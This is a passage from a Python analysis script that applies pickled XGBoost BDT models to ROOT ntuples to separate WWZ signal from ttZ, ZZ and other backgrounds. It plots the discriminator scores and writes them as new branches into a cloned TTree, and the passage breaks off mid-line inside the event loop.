['met_pt','lep3Id','lep4Id','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", \"nb\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_multi_emuHighTTZBDT = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_multi_emu = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_multi_OffZHighTTZBDT = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_multi_OffZ = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\n\t##Getting ROOT files into pandas\n\tdf_ttzzz_bVeto = uproot.open(FileName)['t'].pandas.df(variables_ttzzz_bVeto, flatten=False)\n\tdf_ttzzz_emu = uproot.open(FileName)['t'].pandas.df(variables_ttzzz_emu, flatten=False)\n\tdf_ttzzz_OffZ = uproot.open(FileName)['t'].pandas.df(variables_ttzzz_OffZ, flatten=False)\n\tdf_zz_emu = uproot.open(FileName)['t'].pandas.df(variables_zz_emu, flatten=False)\n\tdf_zz_emuHighTTZBDT = uproot.open(FileName)['t'].pandas.df(variables_zz_emuHighTTZBDT, flatten=False)\n\tdf_zz_OffZ = uproot.open(FileName)['t'].pandas.df(variables_zz_OffZ, flatten=False)\n\tdf_zz_OffZHighTTZBDT = uproot.open(FileName)['t'].pandas.df(variables_zz_OffZHighTTZBDT, flatten=False)\n\tdf_ttz_nbAll = uproot.open(FileName)['t'].pandas.df(variables_ttz_nbAll, flatten=False)\n\tdf_ttz_bVeto = uproot.open(FileName)['t'].pandas.df(variables_ttz_bVeto, flatten=False)\n\tdf_ttz_emu = uproot.open(FileName)['t'].pandas.df(variables_ttz_emu, flatten=False)\n\tdf_ttz_OffZ = uproot.open(FileName)['t'].pandas.df(variables_ttz_OffZ, flatten=False)\n\tdf_multi_nbAll = uproot.open(FileName)['t'].pandas.df(variables_multi_nbAll, flatten=False)\n\tdf_multi_emuHighTTZBDT = uproot.open(FileName)['t'].pandas.df(variables_multi_emuHighTTZBDT, flatten=False)\n\tdf_multi_emu = uproot.open(FileName)['t'].pandas.df(variables_multi_emu, flatten=False)\n\tdf_multi_OffZHighTTZBDT = uproot.open(FileName)['t'].pandas.df(variables_multi_OffZHighTTZBDT, flatten=False)\n\tdf_multi_OffZ = uproot.open(FileName)['t'].pandas.df(variables_multi_OffZ, flatten=False)\n\n\n\tx_test_ttzzz_bVeto = df_ttzzz_bVeto.values\n\ty_test_ttzzz_bVeto = np.zeros(len(df_ttzzz_bVeto))\n\n\tx_test_ttzzz_emu = df_ttzzz_emu.values\n\ty_test_ttzzz_emu = np.zeros(len(df_ttzzz_emu))\n\n\tx_test_ttzzz_OffZ = df_ttzzz_OffZ.values\n\ty_test_ttzzz_OffZ = np.zeros(len(df_ttzzz_OffZ))\n\n\tx_test_zz_emu = df_zz_emu.values\n\ty_test_zz_emu = np.zeros(len(df_zz_emu))\n\n\tx_test_zz_emuHighTTZBDT = df_zz_emuHighTTZBDT.values\n\ty_test_zz_emuHighTTZBDT = np.zeros(len(df_zz_emuHighTTZBDT))\n\n\tx_test_zz_OffZ = df_zz_OffZ.values\n\ty_test_zz_OffZ = np.zeros(len(df_zz_OffZ))\n\n\tx_test_zz_OffZHighTTZBDT = df_zz_OffZHighTTZBDT.values\n\ty_test_zz_OffZHighTTZBDT = np.zeros(len(df_zz_OffZHighTTZBDT))\n\n\tx_test_ttz_nbAll = df_ttz_nbAll.values\n\ty_test_ttz_nbAll = np.zeros(len(df_ttz_nbAll))\n\n\tx_test_ttz_bVeto = df_ttz_bVeto.values\n\ty_test_ttz_bVeto = np.zeros(len(df_ttz_bVeto))\n\n\tx_test_ttz_emu = df_ttz_emu.values\n\ty_test_ttz_emu = np.zeros(len(df_ttz_emu))\n\n\tx_test_ttz_OffZ = df_ttz_OffZ.values\n\ty_test_ttz_OffZ = np.zeros(len(df_ttz_OffZ))\n\n\tx_test_multi_nbAll = df_multi_nbAll.values\n\ty_test_multi_nbAll = np.zeros(len(df_multi_nbAll))\n\n\tx_test_multi_emuHighTTZBDT = df_multi_emuHighTTZBDT.values\n\ty_test_multi_emuHighTTZBDT = np.zeros(len(df_multi_emuHighTTZBDT))\n\n\tx_test_multi_emu = df_multi_emu.values\n\ty_test_multi_emu = np.zeros(len(df_multi_emu))\n\n\tx_test_multi_OffZHighTTZBDT = df_multi_OffZHighTTZBDT.values\n\ty_test_multi_OffZHighTTZBDT = np.zeros(len(df_multi_OffZHighTTZBDT))\n\n\tx_test_multi_OffZ = df_multi_OffZ.values\n\ty_test_multi_OffZ = np.zeros(len(df_multi_OffZ))\n\t############################\n\t# get model from file\n\t############################\n\tmodel_ttzzz_bVeto = pickle.load(open('../models/model_xgb_wwz_vs_ttzzz_bVeto.pkl','rb'))\n\tmodel_ttzzz_emu = pickle.load(open('../models/model_xgb_wwz_vs_ttzzz_emu.pkl','rb'))\n\tmodel_ttzzz_OffZ = pickle.load(open('../models/model_xgb_wwz_vs_ttzzz_OffZ.pkl','rb'))\n\tmodel_zz_emu = pickle.load(open('../models/model_xgb_wwz_vs_zz_emu.pkl','rb'))\n\tmodel_zz_emuHighTTZBDT = pickle.load(open('../models/model_xgb_wwz_vs_zz_emuHighTTZBDT.pkl','rb'))\n\tmodel_zz_OffZ = pickle.load(open('../models/model_xgb_wwz_vs_zz_OffZ.pkl','rb'))\n\tmodel_zz_OffZHighTTZBDT = pickle.load(open('../models/model_xgb_wwz_vs_zz_OffZHighTTZBDT.pkl','rb'))\n\tmodel_ttz_nbAll = pickle.load(open('../models/model_xgb_wwz_vs_ttz_nbAll.pkl','rb'))\n\tmodel_ttz_bVeto = pickle.load(open('../models/model_xgb_wwz_vs_ttz_bVeto.pkl','rb'))\n\tmodel_ttz_emu = pickle.load(open('../models/model_xgb_wwz_vs_ttz_emu.pkl','rb'))\n\tmodel_ttz_OffZ = pickle.load(open('../models/model_xgb_wwz_vs_ttz_OffZ.pkl','rb'))\n\tmodel_multi_nbAll = pickle.load(open('../models/model_xgb_wwz_vs_multi_nbAll.pkl','rb'))\n\tmodel_multi_emuHighTTZBDT = pickle.load(open('../models/model_xgb_wwz_vs_multi_emuHighTTZBDT.pkl','rb'))\n\tmodel_multi_emu = pickle.load(open('../models/model_xgb_wwz_vs_multi_emu.pkl','rb'))\n\tmodel_multi_OffZHighTTZBDT = pickle.load(open('../models/model_xgb_wwz_vs_multi_OffZHighTTZBDT.pkl','rb'))\n\tmodel_multi_OffZ = pickle.load(open('../models/model_xgb_wwz_vs_multi_OffZ.pkl','rb'))\n\t\n\t# make predictions for test data\n\ty_pred_ttzzz_bVeto = model_ttzzz_bVeto.predict_proba(x_test_ttzzz_bVeto)[:, 1]\n\ty_pred_ttzzz_emu = model_ttzzz_emu.predict_proba(x_test_ttzzz_emu)[:, 1]\n\ty_pred_ttzzz_OffZ = model_ttzzz_OffZ.predict_proba(x_test_ttzzz_OffZ)[:, 1]\n\ty_pred_zz_emu = model_zz_emu.predict_proba(x_test_zz_emu)[:, 1]\n\ty_pred_zz_emuHighTTZBDT = model_zz_emuHighTTZBDT.predict_proba(x_test_zz_emuHighTTZBDT)[:, 1]\n\ty_pred_zz_OffZ = model_zz_OffZ.predict_proba(x_test_zz_OffZ)[:, 1]\n\ty_pred_zz_OffZHighTTZBDT = model_zz_OffZHighTTZBDT.predict_proba(x_test_zz_OffZHighTTZBDT)[:, 1]\n\ty_pred_ttz_nbAll = model_ttz_nbAll.predict_proba(x_test_ttz_nbAll)[:, 1]\n\ty_pred_ttz_bVeto = model_ttz_bVeto.predict_proba(x_test_ttz_bVeto)[:, 1]\n\ty_pred_ttz_emu = model_ttz_emu.predict_proba(x_test_ttz_emu)[:, 1]\n\ty_pred_ttz_OffZ = model_ttz_OffZ.predict_proba(x_test_ttz_OffZ)[:, 1]\n\t\n\td_test_multi_nbAll = xgb.DMatrix(x_test_multi_nbAll, label=y_test_multi_nbAll)\n\ty_pred_multi_nbAll = model_multi_nbAll.predict(d_test_multi_nbAll)\n\t\n\td_test_multi_emuHighTTZBDT = xgb.DMatrix(x_test_multi_emuHighTTZBDT, label=y_test_multi_emuHighTTZBDT)\n\ty_pred_multi_emuHighTTZBDT = model_multi_emuHighTTZBDT.predict(d_test_multi_emuHighTTZBDT)\n\n\td_test_multi_emu = xgb.DMatrix(x_test_multi_emu, label=y_test_multi_emu)\n\ty_pred_multi_emu = model_multi_emu.predict(d_test_multi_emu)\n\n\td_test_multi_OffZHighTTZBDT = xgb.DMatrix(x_test_multi_OffZHighTTZBDT, label=y_test_multi_OffZHighTTZBDT)\n\ty_pred_multi_OffZHighTTZBDT = model_multi_OffZHighTTZBDT.predict(d_test_multi_OffZHighTTZBDT)\n\n\td_test_multi_OffZ = xgb.DMatrix(x_test_multi_OffZ, label=y_test_multi_OffZ)\n\ty_pred_multi_OffZ = model_multi_OffZ.predict(d_test_multi_OffZ)\n\t#print y_pred\n\t##########################################################\n\t# make histogram of discriminator value for signal and bkg\n\t##########################################################\n\ty_frame_ttzzz_bVeto = pd.DataFrame({'truth':y_test_ttzzz_bVeto, 'disc':y_pred_ttzzz_bVeto})\n\ty_frame_ttzzz_emu = pd.DataFrame({'truth':y_test_ttzzz_emu, 'disc':y_pred_ttzzz_emu})\n\ty_frame_ttzzz_OffZ = pd.DataFrame({'truth':y_test_ttzzz_OffZ, 'disc':y_pred_ttzzz_OffZ})\n\ty_frame_zz_emu = pd.DataFrame({'truth':y_test_zz_emu, 'disc':y_pred_zz_emu})\n\ty_frame_zz_emuHighTTZBDT = pd.DataFrame({'truth':y_test_zz_emuHighTTZBDT, 'disc':y_pred_zz_emuHighTTZBDT})\n\ty_frame_zz_OffZ = pd.DataFrame({'truth':y_test_zz_OffZ, 'disc':y_pred_zz_OffZ})\n\ty_frame_zz_OffZHighTTZBDT = pd.DataFrame({'truth':y_test_zz_OffZHighTTZBDT, 'disc':y_pred_zz_OffZHighTTZBDT})\n\ty_frame_ttz_nbAll = pd.DataFrame({'truth':y_test_ttz_nbAll, 'disc':y_pred_ttz_nbAll})\n\ty_frame_ttz_bVeto = pd.DataFrame({'truth':y_test_ttz_bVeto, 'disc':y_pred_ttz_bVeto})\n\ty_frame_ttz_emu = pd.DataFrame({'truth':y_test_ttz_emu, 'disc':y_pred_ttz_emu})\n\ty_frame_ttz_OffZ = pd.DataFrame({'truth':y_test_ttz_OffZ, 'disc':y_pred_ttz_OffZ})\n\ty_frame_multi_nbAll = pd.DataFrame({'truth':y_test_multi_nbAll, 'disc':y_pred_multi_nbAll})\n\ty_frame_multi_emuHighTTZBDT = pd.DataFrame({'truth':y_test_multi_emuHighTTZBDT, 'disc':y_pred_multi_emuHighTTZBDT})\n\ty_frame_multi_emu = pd.DataFrame({'truth':y_test_multi_emu, 'disc':y_pred_multi_emu})\n\ty_frame_multi_OffZHighTTZBDT = pd.DataFrame({'truth':y_test_multi_OffZHighTTZBDT, 'disc':y_pred_multi_OffZHighTTZBDT})\n\ty_frame_multi_OffZ = pd.DataFrame({'truth':y_test_multi_OffZ, 'disc':y_pred_multi_OffZ})\n\tdisc_ttzzz_bVeto = y_frame_ttzzz_bVeto[y_frame_ttzzz_bVeto['truth'] == 0]['disc'].values\n\tdisc_ttzzz_emu = y_frame_ttzzz_emu[y_frame_ttzzz_emu['truth'] == 0]['disc'].values\n\tdisc_ttzzz_OffZ = y_frame_ttzzz_OffZ[y_frame_ttzzz_OffZ['truth'] == 0]['disc'].values\n\tdisc_zz_emu = y_frame_zz_emu[y_frame_zz_emu['truth'] == 0]['disc'].values\n\tdisc_zz_emuHighTTZBDT = y_frame_zz_emuHighTTZBDT[y_frame_zz_emuHighTTZBDT['truth'] == 0]['disc'].values\n\tdisc_zz_OffZ = y_frame_zz_OffZ[y_frame_zz_OffZ['truth'] == 0]['disc'].values\n\tdisc_zz_OffZHighTTZBDT = y_frame_zz_OffZHighTTZBDT[y_frame_zz_OffZHighTTZBDT['truth'] == 0]['disc'].values\n\tdisc_ttz_nbAll = y_frame_ttz_nbAll[y_frame_ttz_nbAll['truth'] == 0]['disc'].values\n\tdisc_ttz_bVeto = y_frame_ttz_bVeto[y_frame_ttz_bVeto['truth'] == 0]['disc'].values\n\tdisc_ttz_emu = y_frame_ttz_emu[y_frame_ttz_emu['truth'] == 0]['disc'].values\n\tdisc_ttz_OffZ = y_frame_ttz_OffZ[y_frame_ttz_OffZ['truth'] == 0]['disc'].values\n\tdisc_multi_nbAll = y_frame_multi_nbAll[y_frame_multi_nbAll['truth'] == 0]['disc'].values\n\tdisc_multi_emuHighTTZBDT = y_frame_multi_emuHighTTZBDT[y_frame_multi_emuHighTTZBDT['truth'] == 0]['disc'].values\n\tdisc_multi_emu = y_frame_multi_emu[y_frame_multi_emu['truth'] == 0]['disc'].values\n\tdisc_multi_OffZHighTTZBDT = y_frame_multi_OffZHighTTZBDT[y_frame_multi_OffZHighTTZBDT['truth'] == 0]['disc'].values\n\tdisc_multi_OffZ = y_frame_multi_OffZ[y_frame_multi_OffZ['truth'] == 0]['disc'].values\n\n\tif mkplot == \"yes\":\n\t\tplt.figure()\n\t\tplt.hist(disc_ttzzz_bVeto, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttzzz_bVeto_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttzzz_emu, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttzzz_emu_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttzzz_OffZ, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttzzz_OffZ_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_zz_emu, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_zz_emu_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_zz_emuHighTTZBDT, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_zz_emuHighTTZBDT_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_zz_OffZ, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_zz_OffZ_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_zz_OffZHighTTZBDT, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_zz_OffZHighTTZBDT_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttz_nbAll, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttz_nbAll_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttz_bVeto, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttz_bVeto_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttz_emu, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttz_emu_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttz_OffZ, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttz_OffZ_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_nbAll, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_nbAll_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_emuHighTTZBDT, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_emuHighTTZBDT_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_emu, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_emu_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_OffZHighTTZBDT, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_OffZHighTTZBDT_' + sample + '.png')\n\t\tos.system(\"chmod 755 \"+plotDir+\"scores/*\")\n\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_OffZ, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_OffZ_' + sample + '.png')\n\t\tos.system(\"chmod 755 \"+plotDir+\"scores/*\")\n\t#############################################\n\t##Creating a new TTree with the discriminator\n\t#############################################\n\n\tch = root.TChain(\"t\")\n\tch.Add(FileName)\n\tif filterBDTvariables == \"yes\":\n\t\tch.SetBranchStatus(\"lep_Z_idx0\",0)\n\t\tch.SetBranchStatus(\"lep_Z_idx1\",0)\n\t\tch.SetBranchStatus(\"lep_N_idx0\",0)\n\t\tch.SetBranchStatus(\"lep_N_idx1\",0)\n\t\tch.SetBranchStatus(\"eventweight\",0)\n\t\tch.SetBranchStatus(\"lepsf\",0)\n\t\tch.SetBranchStatus(\"MllN\",0)\n\t\tch.SetBranchStatus(\"MllZ\",0)\n\t\tch.SetBranchStatus(\"ZPt\",0)\n\t\tch.SetBranchStatus(\"lep1Pt\",0)\n\t\tch.SetBranchStatus(\"lep2Pt\",0)\n\t\tch.SetBranchStatus(\"lep3Pt\",0)\n\t\tch.SetBranchStatus(\"lep4Pt\",0)\n\t\tch.SetBranchStatus(\"lep3Id\",0)\n\t\tch.SetBranchStatus(\"lep4Id\",0)\n\t\tch.SetBranchStatus(\"lep3MT\",0)\n\t\tch.SetBranchStatus(\"lep4MT\",0)\n\t\tch.SetBranchStatus(\"lep34MT\",0)\n\t\tch.SetBranchStatus(\"lep1dZ\",0)\n\t\tch.SetBranchStatus(\"lep2dZ\",0)\n\t\tch.SetBranchStatus(\"lep3dZ\",0)\n\t\tch.SetBranchStatus(\"lep4dZ\",0)\n\t\tch.SetBranchStatus(\"pt_zeta\",0)\n\t\tch.SetBranchStatus(\"pt_zeta_vis\",0)\n\t\tch.SetBranchStatus(\"phi0\",0)\n\t\tch.SetBranchStatus(\"phi\",0)\n\t\tch.SetBranchStatus(\"phiH\",0)\n\t\tch.SetBranchStatus(\"theta0\",0)\n\t\tch.SetBranchStatus(\"theta1\",0)\n\t\tch.SetBranchStatus(\"theta2\",0)\n\t\tch.SetBranchStatus(\"minDRJetToLep3\",0)\n\t\tch.SetBranchStatus(\"minDRJetToLep4\",0)\n\t\tch.SetBranchStatus(\"jet1Pt\",0)\n\t\tch.SetBranchStatus(\"jet2Pt\",0)\n\t\tch.SetBranchStatus(\"jet3Pt\",0)\n\t\tch.SetBranchStatus(\"jet4Pt\",0)\n\t\tch.SetBranchStatus(\"jet1BtagScore\",0)\n\t\tch.SetBranchStatus(\"jet2BtagScore\",0)\n\t\tch.SetBranchStatus(\"jet3BtagScore\",0)\n\t\tch.SetBranchStatus(\"jet4BtagScore\",0)\n\tnEntries = ch.GetEntries()\n\tprint(\"nEntries = \"+str(nEntries))\n\toutFile = fileDir+\".BDT/\"+sample\n\tnewFile = root.TFile(outFile,\"RECREATE\") \n\tch_new = ch.CloneTree(0)\n\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttzzz_bVeto{float disc_ttzzz_bVeto;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttzzz_emu{float disc_ttzzz_emu;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttzzz_OffZ{float disc_ttzzz_OffZ;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_zz_emu{float disc_zz_emu;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_zz_emuHighTTZBDT{float disc_zz_emuHighTTZBDT;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_zz_OffZ{float disc_zz_OffZ;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_zz_OffZHighTTZBDT{float disc_zz_OffZHighTTZBDT;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttz_nbAll{float disc_ttz_nbAll;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttz_bVeto{float disc_ttz_bVeto;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttz_emu{float disc_ttz_emu;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttz_OffZ{float disc_ttz_OffZ;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_nbAll{float disc_multi_nbAll;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_emuHighTTZBDT{float disc_multi_emuHighTTZBDT;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_emu{float disc_multi_emu;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_OffZHighTTZBDT{float disc_multi_OffZHighTTZBDT;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_OffZ{float disc_multi_OffZ;};\")\n\n\tfrom ROOT import MyStruct_ttzzz_bVeto\n\tfrom ROOT import MyStruct_ttzzz_emu\n\tfrom ROOT import MyStruct_ttzzz_OffZ\n\tfrom ROOT import MyStruct_zz_emu\n\tfrom ROOT import MyStruct_zz_emuHighTTZBDT\n\tfrom ROOT import MyStruct_zz_OffZ\n\tfrom ROOT import MyStruct_zz_OffZHighTTZBDT\n\tfrom ROOT import MyStruct_ttz_nbAll\n\tfrom ROOT import MyStruct_ttz_bVeto\n\tfrom ROOT import MyStruct_ttz_emu\n\tfrom ROOT import MyStruct_ttz_OffZ\n\tfrom ROOT import MyStruct_multi_nbAll\n\tfrom ROOT import MyStruct_multi_emuHighTTZBDT\n\tfrom ROOT import MyStruct_multi_emu\n\tfrom ROOT import MyStruct_multi_OffZHighTTZBDT\n\tfrom ROOT import MyStruct_multi_OffZ\n\n\t# Create branches in the tree\n\ts_ttzzz_bVeto = MyStruct_ttzzz_bVeto()\n\ts_ttzzz_emu = MyStruct_ttzzz_emu()\n\ts_ttzzz_OffZ = MyStruct_ttzzz_OffZ()\n\ts_zz_emu = MyStruct_zz_emu()\n\ts_zz_emuHighTTZBDT = MyStruct_zz_emuHighTTZBDT()\n\ts_zz_OffZ = MyStruct_zz_OffZ()\n\ts_zz_OffZHighTTZBDT = MyStruct_zz_OffZHighTTZBDT()\n\ts_ttz_nbAll = MyStruct_ttz_nbAll()\n\ts_ttz_bVeto = MyStruct_ttz_bVeto()\n\ts_ttz_emu = MyStruct_ttz_emu()\n\ts_ttz_OffZ = MyStruct_ttz_OffZ()\n\ts_multi_nbAll = MyStruct_multi_nbAll()\n\ts_multi_emuHighTTZBDT = MyStruct_multi_emuHighTTZBDT()\n\ts_multi_emu = MyStruct_multi_emu()\n\ts_multi_OffZHighTTZBDT = MyStruct_multi_OffZHighTTZBDT()\n\ts_multi_OffZ = MyStruct_multi_OffZ()\n\n\tbpt_ttzzz_bVeto = ch_new.Branch('disc_ttzzz_bVeto',root.AddressOf(s_ttzzz_bVeto,'disc_ttzzz_bVeto'),'disc_ttzzz_bVeto/F');\n\tbpt_ttzzz_emu = ch_new.Branch('disc_ttzzz_emu',root.AddressOf(s_ttzzz_emu,'disc_ttzzz_emu'),'disc_ttzzz_emu/F');\n\tbpt_ttzzz_OffZ = ch_new.Branch('disc_ttzzz_OffZ',root.AddressOf(s_ttzzz_OffZ,'disc_ttzzz_OffZ'),'disc_ttzzz_OffZ/F');\n\tbpt_zz_emu = ch_new.Branch('disc_zz_emu',root.AddressOf(s_zz_emu,'disc_zz_emu'),'disc_zz_emu/F');\n\tbpt_zz_emuHighTTZBDT = ch_new.Branch('disc_zz_emuHighTTZBDT',root.AddressOf(s_zz_emuHighTTZBDT,'disc_zz_emuHighTTZBDT'),'disc_zz_emuHighTTZBDT/F');\n\tbpt_zz_OffZ = ch_new.Branch('disc_zz_OffZ',root.AddressOf(s_zz_OffZ,'disc_zz_OffZ'),'disc_zz_OffZ/F');\n\tbpt_zz_OffZHighTTZBDT = ch_new.Branch('disc_zz_OffZHighTTZBDT',root.AddressOf(s_zz_OffZHighTTZBDT,'disc_zz_OffZHighTTZBDT'),'disc_zz_OffZHighTTZBDT/F');\n\tbpt_ttz_nbAll = ch_new.Branch('disc_ttz_nbAll',root.AddressOf(s_ttz_nbAll,'disc_ttz_nbAll'),'disc_ttz_nbAll/F');\n\tbpt_ttz_bVeto = ch_new.Branch('disc_ttz_bVeto',root.AddressOf(s_ttz_bVeto,'disc_ttz_bVeto'),'disc_ttz_bVeto/F');\n\tbpt_ttz_emu = ch_new.Branch('disc_ttz_emu',root.AddressOf(s_ttz_emu,'disc_ttz_emu'),'disc_ttz_emu/F');\n\tbpt_ttz_OffZ = ch_new.Branch('disc_ttz_OffZ',root.AddressOf(s_ttz_OffZ,'disc_ttz_OffZ'),'disc_ttz_OffZ/F');\n\tbpt_multi_nbAll = ch_new.Branch('disc_multi_nbAll',root.AddressOf(s_multi_nbAll,'disc_multi_nbAll'),'disc_multi_nbAll/F');\n\tbpt_multi_emuHighTTZBDT = ch_new.Branch('disc_multi_emuHighTTZBDT',root.AddressOf(s_multi_emuHighTTZBDT,'disc_multi_emuHighTTZBDT'),'disc_multi_emuHighTTZBDT/F');\n\tbpt_multi_emu = ch_new.Branch('disc_multi_emu',root.AddressOf(s_multi_emu,'disc_multi_emu'),'disc_multi_emu/F');\n\tbpt_multi_OffZHighTTZBDT = ch_new.Branch('disc_multi_OffZHighTTZBDT',root.AddressOf(s_multi_OffZHighTTZBDT,'disc_multi_OffZHighTTZBDT'),'disc_multi_OffZHighTTZBDT/F');\n\tbpt_multi_OffZ = ch_new.Branch('disc_multi_OffZ',root.AddressOf(s_multi_OffZ,'disc_multi_OffZ'),'disc_multi_OffZ/F');\n\n\tfor i in range(nEntries):\n\t\tch.GetEntry(i)\n\t\tif i%10000==0:\n\t\t\tprint(\"Processing event nr. \"+str(i)+\" of \" + str(nEntries))\n\t\ts_ttzzz_bVeto.disc_ttzzz_bVeto = disc_ttzzz_bVeto[i]\n\t\ts_ttzzz_emu.disc_ttzzz_emu = disc_ttzzz_emu[i]\n\t\ts_ttzzz_OffZ.disc_ttzzz_OffZ = disc_ttzzz_OffZ[i]\n\t\ts_zz_emu.disc_zz_emu = disc_zz_emu[i]\n\t\ts_zz_emuHighTTZBDT.disc_zz_emuHighTTZBDT = disc_zz_emuHighTTZBDT[i]\n\t\ts_zz_OffZHighTTZBDT.disc_zz_OffZHighTTZBDT = disc_zz_OffZHighTTZBDT[i]\n\t\ts_ttz_nbAll.disc_ttz_nbAll = disc_ttz_nbAll[i]\n\t\ts_ttz_bVeto.disc_ttz_bVeto = disc_ttz_bVeto[i]\n\t\ts_ttz_emu.disc_ttz_emu = disc_ttz_emu[i]\n\t\ts_ttz_OffZ.disc_ttz_OffZ = disc_ttz_OffZ[i]\n\t\ts_multi_nbAll.disc_multi_nbAll = disc_multi_nbAll[i]\n\t\ts_multi_emuHighTTZBDT.disc_multi_emuHighTTZBDT = disc_multi_emuHighTTZBDT[i]\n\t\ts_multi_emu.disc_multi_emu = disc_multi_emu[i]\n\t\ts_multi_OffZHighTTZBDT.disc_multi_OffZHighTTZBDT = disc_multi_OffZHighTTZBDT[i]\n\t\ts_multi_OffZ.disc_multi_OffZ = 